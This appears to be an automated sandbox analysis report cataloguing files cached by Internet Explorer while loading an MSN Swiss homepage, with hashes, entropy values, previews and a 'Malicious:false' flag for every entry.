                                                                                                                                                                                                                                  Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\de-ch[1].htm
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):422570
                                                                                                                                                                                                                                  Entropy (8bit):5.442053261488214
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:oJRJUwxx+hAkJ8WZcad0vr6emugoLQG8SLLvBAeXdnBMlqXXpLV:oJRxOhjo0G8kHMlqXX3
                                                                                                                                                                                                                                  MD5:775F3BE44358D3F66C2F9A3B086463DC
                                                                                                                                                                                                                                  SHA1:9847883EE3E8AD648B264BCFBC690B2791F6C722
                                                                                                                                                                                                                                  SHA-256:0C451255FF719B4C868FF35D4AD18CBE3DD11EA8BF6DF7B0F680766EB9B0AE37
                                                                                                                                                                                                                                  SHA-512:27CBC08105B9BBC67431C5683EC612B03177F151E2461B68359FCD87FCD4C367A0805BED55BFACBFABB95F2D59AD62FB8AA5EC87F137537F11D461805DD0D32B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210909_23937236;a:85798559-45c5-4b10-b741-80716ce798ce;cn:5;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 5, sn: neurope-prod-hp, dt: 2021-09-02T17:29:08.0751554Z, bt: 2021-09-09T00:14:30.9925819Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-08-11 10:21:32Z;xdmap:2021-09-10 09:10:40Z;axd:;f:msnallexpusers,muidflt20cf,muidflt56cf,mmxandroid1cf,platagyedge2cf,audexedge2cf,bingcollabedge1cf,pnehp1cf,starthp1cf,audexhz1cf,onetrustpoplive,msnapp2cf,1s-bing-news,vebudumu04302020,bbh20200521msncf,prg-1sw-cont,prg-1sw-hmtp,prg-1sw-lowctrl,prg-adspeek,btrecrow1,1s-winauthservice,prg-wpo-hpolypc,weather6cf,prg-1sw-flyt-htpc,prg-1sw-wcont3,prg-1sw-ownformat,prg-brandupwhp;userOptOut:false;userOptOutOptions:" data-js="{&quot
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\dnserror[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2997
                                                                                                                                                                                                                                  Entropy (8bit):4.4885437940628465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                                                                                                                                                                                                  MD5:2DC61EB461DA1436F5D22BCE51425660
                                                                                                                                                                                                                                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                                                                                                                                                                                                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                                                                                                                                                                                                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\errorPageStrings[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\errorPageStrings[2]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4720
                                                                                                                                                                                                                                  Entropy (8bit):5.164796203267696
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                                                                                                                                                                                                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                                                                                                                                                                                                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                                                                                                                                                                                                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                                                                                                                                                                                                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\httpErrorPagesScripts[1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12105
                                                                                                                                                                                                                                  Entropy (8bit):5.451485481468043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                                                                                  MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                                                                                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                                                                                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                                                                                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http___cdn.taboola.com_libtrc_static_thumbnails_07804453bf90da635cf952e3d393ab12[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23695
                                                                                                                                                                                                                                  Entropy (8bit):7.981916066043364
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8ViqNzoTYUPRBfZ9FOnBywsaQg9dhJbbZ86Sh9NbkflSo+P:8JRUVZfOnByaPb9i6Sh/mu
                                                                                                                                                                                                                                  MD5:FB1A38AF3E936CC846BCCE134FD77093
                                                                                                                                                                                                                                  SHA1:B81E1178B58201BD9F664F2750510C3BF2803448
                                                                                                                                                                                                                                  SHA-256:D23689198DE867AEE58CDF9F95235F0CB5E07E92498CA3FD1D594A10825A2113
                                                                                                                                                                                                                                  SHA-512:7DD6D1E083963EC055DA879EB8C41451B0ABE12B738790EF047685EB6369B90D21152E81EDB8AD98587D48464F6C6E04CA8810CF591F508330D550F0E80296CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\http___cdn.taboola.com_libtrc_static_thumbnails_11b9f069e5e00ff6dd3050259af20493[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15509
                                                                                                                                                                                                                                  Entropy (8bit):7.958249795493221
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ZvHVQHFciO+PTTADMJnK5HmW659pgMGAvkU4kVehfgA/:Zv8ciHPTWMJKQl6MGZDhfX
                                                                                                                                                                                                                                  MD5:BF391688F908C659D6E40B810AAE418C
                                                                                                                                                                                                                                  SHA1:BD1AD5B9B8B8D8BAED7B7EC29867AB047A1AEB7D
                                                                                                                                                                                                                                  SHA-256:89C9BF8685D7706CF2851953B0347F74627AA31E74B9112A7BBDAA1300B5BF1F
                                                                                                                                                                                                                                  SHA-512:BB598A204EA478DA7B574A2191B4D9582CF351048298502A74BF8DF4B03AB0142253E4FD9A2C63E33FC6E8B55C61FDB77B3A046A59D7404A13E25E3C1ACCC73C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\jquery-2.1.1.min[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):84249
                                                                                                                                                                                                                                  Entropy (8bit):5.369991369254365
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                                                                                                                                                                                                  MD5:9A094379D98C6458D480AD5A51C4AA27
                                                                                                                                                                                                                                  SHA1:3FE9D8ACAAEC99FC8A3F0E90ED66D5057DA2DE4E
                                                                                                                                                                                                                                  SHA-256:B2CE8462D173FC92B60F98701F45443710E423AF1B11525A762008FF2C1A0204
                                                                                                                                                                                                                                  SHA-512:4BBB1CCB1C9712ACE14220D79A16CAD01B56A4175A0DD837A90CA4D6EC262EBF0FC20E6FA1E19DB593F3D593DDD90CFDFFE492EF17A356A1756F27F90376B650
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\location[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):182
                                                                                                                                                                                                                                  Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                  MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                  SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                  SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                  SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\1621266752856-586[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):195845
                                                                                                                                                                                                                                  Entropy (8bit):7.986893102264154
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:oTDjJlV5z0VKP9Wue3nJSnMZ+jVguSAFfdrEuQ3T/ixIBIvRNzWdqx6:o3jJl7Qg9Wuznd+uRXrEuQD/Abidqx6
                                                                                                                                                                                                                                  MD5:441833DE41DFE8D94AC6F8CE4E751EBA
                                                                                                                                                                                                                                  SHA1:0B498BD07F3146008C101714D95A3DD0284F8D85
                                                                                                                                                                                                                                  SHA-256:73C3655356EB29B6DB5B64F7C8E6AEBD1F94A20108AECAB1B26E6A32F205ADEA
                                                                                                                                                                                                                                  SHA-512:FF6D451DCF8F2DA27AD78E9B89BC6A690FE0D0F61B2A251765CEEC6F69D95C291DB8E6C54D27729B25A2FDF2073F7B48558789FFF073C7F5CA28E5BA3E9C6D33
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                                  MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                                  SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                                  SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                                  SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):251398
                                                                                                                                                                                                                                  Entropy (8bit):5.2940351809352855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:FaPMULTAHEkm8OUdvUvJZkrqq7pjD4tQH:Fa0ULTAHLOUdvwZkrqq7pjD4tQH
                                                                                                                                                                                                                                  MD5:24D71CC2CC17F9E0F7167D724347DBA4
                                                                                                                                                                                                                                  SHA1:4188B4EE11CFDC8EA05E7DA7F475F6A464951E27
                                                                                                                                                                                                                                  SHA-256:4EF29E187222C5E2960E1E265C87AA7DA7268408C3383CC3274D97127F389B22
                                                                                                                                                                                                                                  SHA-512:43CF44624EF76F5B83DE10A2FB1C27608A290BC21BF023A1BFDB77B2EBB4964805C8683F82815045668A3ECCF2F16A4D7948C1C5AC526AC71760F50C82AADE2B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\52-478955-68ddb2ab[1].js
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):396806
                                                                                                                                                                                                                                  Entropy (8bit):5.324119649220133
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:YXP9M/wSg/jgyYZw44KfhmnidDWPqIjHSjaXCr1BgxO0DkV4FcjtIuNK:CW/VonidDWPqIjHdC16tbcjut
                                                                                                                                                                                                                                  MD5:3BBA5129E3BFA05EF2B57F231B5E7A10
                                                                                                                                                                                                                                  SHA1:7CDF93AD45B9624105F0805E3BE03310F43C8B37
                                                                                                                                                                                                                                  SHA-256:270DA5C0051987EBCEDBF06B98110CEE3ADE3E9DA71A3AB5C09C404FBA09CC60
                                                                                                                                                                                                                                  SHA-512:FD976CB278DAC5AB411A0EEDE0BCA22BCFE5D244F56A7666D93C5C3C4C5C55CCBFBAB33143D399E72C9FBB66833A787E3E5114CDBC5F679449923F8867B089A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\96c4d66b-0900-4e9e-bb18-d3bcefb093c5[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):53553
                                                                                                                                                                                                                                  Entropy (8bit):7.956609581726886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:nIczSo3tZl4bzl+48or+cz+5evAM4jge5:nIItf4lpmzevw
                                                                                                                                                                                                                                  MD5:BB344AED4929C6331344227E9D5EAD84
                                                                                                                                                                                                                                  SHA1:5726ACDCFE7CDEB27BECFE771C38029DDD64DADA
                                                                                                                                                                                                                                  SHA-256:370B3C5DBA25F8D53CD5E01CA60BA1B2BC9245AA1C430D8A9773EBBDB8320D81
                                                                                                                                                                                                                                  SHA-512:628D3C53CD23E9CC1B2323300FAE1FC40DF6CCCF5DD8A45E952AC1993662DC9FC9D4BC5D875366FF74F755D3C8A6DF4BF9F09A264BA3B54D57B9B26A4F5B5CA8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AAMqFmF[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):553
                                                                                                                                                                                                                                  Entropy (8bit):7.46876473352088
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:6v/7kFXASpDCVwSb5I63cth5gCsKXLS39hWf98i67JK:PFXkV3lBKbSt8MVK
                                                                                                                                                                                                                                  MD5:DE563FA7F44557BF8AC02F9768813940
                                                                                                                                                                                                                                  SHA1:FE7DE6F67BFE9AA29185576095B9153346559B43
                                                                                                                                                                                                                                  SHA-256:B9465D67666C6BAB5261BB57AE4FC52ED6C88E52D923210372A9692A928BDDE2
                                                                                                                                                                                                                                  SHA-512:B74308C36987A45BC96E80E7C68AB935A3CC51CD3C9B4D0A8A784342B268715A937445DEB3AEF4CA5723FBC215B1CAD4E7BC7294EECEC04A2F1786EDE73E19A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANf6qa[1].png
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                  Entropy (8bit):7.252548911424453
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:6v/lhPahm7saDdLbPvjAEQhnZxqQ7FULH4hYHgjtoYFWYooCUQVHyXRTTrYm/RTy:6v/79Zb8FZxqQJ4Yhro0Lsm96d
                                                                                                                                                                                                                                  MD5:7ED73D785784B44CF3BD897AB475E5CF
                                                                                                                                                                                                                                  SHA1:47A753F5550D727F2FB5535AD77F5042E5F6D954
                                                                                                                                                                                                                                  SHA-256:EEEA2FBC7695452F186059EC6668A2C8AE469975EBBAF5140B8AC40F642AC466
                                                                                                                                                                                                                                  SHA-512:FAF9E3AF38796B906F198712772ACBF361820367BDC550076D6D89C2F474082CC79725EC81CECF661FA9EFF3316EE10853C75594D5022319EAE9D078802D9C77
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANg9R8[1].jpg
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27866
                                                                                                                                                                                                                                  Entropy (8bit):7.9012317290639515
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I2Zq3LwC9rPFs42M/6+qsP2BvpTRohxC9HW9M0dAqT:I80drPhR6HuvAqT
                                                                                                                                                                                                                                  MD5:22A765E78393D6675377E20F60E382DE
                                                                                                                                                                                                                                  SHA1:94F6AF29EA57274BFEEE6CCD41EDDB14F0583F24
                                                                                                                                                                                                                                  SHA-256:E621E02B6BB36B9FE5FD1F2E47D08EBCC8BAC15275F3F70569FBC7E116E6F342
                                                                                                                                                                                                                                  SHA-512:B2AAC7B7BC88BEE4BEC9D6EFFC252924B3E7D923C5B9E2FECB90260F29A48BE9A7A16CF04FF0926461CA98AE2E69C116D138335C228A863EB0D8C27F98D02C83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\AANuZgF[1].png
